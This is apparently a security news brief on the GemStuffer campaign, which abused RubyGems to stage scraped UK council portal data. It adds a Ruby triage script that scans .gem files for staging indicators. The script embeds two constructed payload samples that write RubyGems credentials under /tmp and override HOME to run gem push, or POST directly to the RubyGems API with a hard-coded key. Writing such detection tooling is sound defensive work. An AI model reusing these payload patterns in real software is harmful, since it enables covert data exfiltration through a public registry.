GemStuffer Abuses 150+ RubyGems to Exfiltrate Scraped U.K. Council Portal Data
Briefly

"The packages do not appear designed for mass developer compromise," Socket said. "Many have little or no download activity, and the payloads are repetitive, noisy, and unusually self-contained."
"Instead, the scripts fetch pages from U.K. local government democratic services portals, package the collected responses into valid .gem archives, and publish those gems back to RubyGems using hardcoded API keys."
"At a high level, the campaign abuses RubyGems as a place to stage the scraped council content. It does this by fetching hard-coded U.K. council portal URLs, packaging the HTTP responses into valid .gem archives, and publishing those archives to RubyGems using embedded registry credentials."
"In some cases, the payload embedded within the gem creates a temporary RubyGems credential environment under "/tmp," overrides the HOME environment variable, builds a gem locally, and pushes it to RubyGems using the gem command-line interface (CLI), as opposed to depending on pre-existing RubyGems credentials on the target machine."
GemStuffer targets the RubyGems repository with more than 150 gems that use the registry for data exfiltration rather than mass developer compromise. The gems fetch pages from UK local government democratic services portals, package the collected HTTP responses into valid .gem archives, and publish those archives back to RubyGems using embedded API credentials. Some payloads create a temporary RubyGems credential environment under /tmp, override HOME so that the gem CLI reads those credentials instead of any already on the host, build the gem locally, and push it via the gem CLI. Other variants upload the archive directly to the RubyGems API with an HTTP POST request. After publication, the attackers can retrieve the stored data by running gem fetch for the gem name and version; because the gems are public, so can anyone else who knows those two values.
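As an added triage example (not code from the page, from Socket, or from the campaign itself), the script below unpacks a .gem with Ruby's stdlib Gem::Package API and flags the staging behaviours summarised above: a hard-coded council URL, a throwaway HOME under /tmp with a written credentials file, a gem push, or a direct POST to the RubyGems API with an embedded Authorization value. The indicator regexes, the gem name demo-stuffed, the URL under example.gov.uk and the two sample payloads are constructed assumptions for the demonstration, not strings taken from real GemStuffer gems.

```ruby
require "rubygems"
require "rubygems/package"
require "tmpdir"
require "fileutils"

# Behavioural indicators for the staging pattern described above. The exact
# strings a real payload uses are not on the page; these regexes are assumptions.
INDICATORS = {
  council_fetch:        %r{https?://[^"'\s]*\.gov\.uk},            # hard-coded UK council URL
  tmp_home:             %r{["']/tmp/},                              # throwaway HOME under /tmp
  credentials_write:    %r{\.gem/credentials},                      # writes a .gem/credentials file
  api_key_literal:      /:rubygems_api_key:/,                       # credentials YAML line with a key
  home_override:        /ENV\[["']HOME["']\]\s*=/,                  # points the gem CLI at that HOME
  gem_push:             /gem\s+push|"gem",\s*"push"|PushCommand/,   # publishes via the gem CLI
  direct_api_post:      %r{rubygems\.org/api/v1/gems},              # direct POST to the RubyGems API
  authorization_header: /\["Authorization"\]\s*=\s*["']/,           # hard-coded Authorization value
  stuffed_html:         /\A\s*<(!DOCTYPE html|html)/i,              # scraped page stored as a gem file
}.freeze

# Two ways a gem can publish to RubyGems at run time: materialised CLI
# credentials plus `gem push`, or a direct API upload with an embedded key.
STAGING_PATTERNS = [
  %i[home_override credentials_write gem_push],
  %i[direct_api_post authorization_header],
].freeze

# Returns the indicator names whose regex matches the given file contents.
def scan_source(text)
  INDICATORS.select { |_name, re| text.match?(re) }.keys
end

# Unpacks a .gem into a scratch directory and returns { "path" => [indicators] }
# for every packaged file with at least one hit.
def scan_gem(gem_path)
  pkg = Gem::Package.new(gem_path)
  Dir.mktmpdir("gemscan") do |dir|
    pkg.extract_files(dir)
    pkg.contents.each_with_object({}) do |rel, out|
      hits = scan_source(File.binread(File.join(dir, rel)))
      out[rel] = hits unless hits.empty?
    end
  end
end

# True when the findings contain a complete run-time publish path.
def stages_to_rubygems?(findings)
  hits = findings.values.flatten.uniq
  STAGING_PATTERNS.any? { |pattern| (pattern - hits).empty? }
end

# Constructed stand-ins for the two payload variants; not GemStuffer code.
SAMPLE_CLI_PAYLOAD = <<~'RUBY'
  require "net/http"
  require "fileutils"
  page = Net::HTTP.get(URI("https://democracy.example.gov.uk/committees"))
  home = "/tmp/gh-#{rand(1 << 32).to_s(16)}"
  FileUtils.mkdir_p("#{home}/.gem")
  File.write("#{home}/.gem/credentials", "---\n:rubygems_api_key: rubygems_REDACTED\n")
  ENV["HOME"] = home
  system("gem", "build", "stuffed.gemspec")
  system("gem", "push", "stuffed-0.0.1.gem")
RUBY

SAMPLE_POST_PAYLOAD = <<~'RUBY'
  require "net/http"
  uri = URI("https://rubygems.org/api/v1/gems")
  req = Net::HTTP::Post.new(uri)
  req["Authorization"] = "rubygems_REDACTED"
  req.body = File.binread("stuffed-0.0.1.gem")
  Net::HTTP.start(uri.host, uri.port, use_ssl: true) { |http| http.request(req) }
RUBY

SAMPLE_HTML = "<!DOCTYPE html>\n<html><body><h1>Committees (constructed page)</h1></body></html>\n"

# Builds a constructed gem named demo-stuffed (not a gem from the campaign)
# containing the samples above, and returns its path.
def build_sample_gem(dir)
  Dir.chdir(dir) do
    FileUtils.mkdir_p("lib")
    File.write("lib/stuffer.rb", SAMPLE_CLI_PAYLOAD)
    File.write("lib/uploader.rb", SAMPLE_POST_PAYLOAD)
    File.write("council-page.html", SAMPLE_HTML)
    spec = Gem::Specification.new do |s|
      s.name    = "demo-stuffed"
      s.version = "0.0.1"
      s.summary = "constructed sample for scanning"
      s.authors = ["constructed"]
      s.files   = ["lib/stuffer.rb", "lib/uploader.rb", "council-page.html"]
    end
    File.join(dir, Gem::Package.build(spec, true)) # skip_validation: no licence etc.
  end
end

if __FILE__ == $PROGRAM_NAME
  Dir.mktmpdir("gemstuffer-demo") do |dir|
    findings = scan_gem(build_sample_gem(dir))
    findings.each { |path, hits| puts "#{path}: #{hits.join(', ')}" }
    puts "stages data to RubyGems: #{stages_to_rubygems?(findings)}"
  end
end
```

Alerting on a complete publish path rather than on any single string keeps ordinary gems that merely mention /tmp or ship HTML fixtures out of the result. To triage a real artifact, point scan_gem at the file produced by gem fetch NAME -v VERSION, which downloads the archive without installing or executing anything in it.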
Read at The Hacker News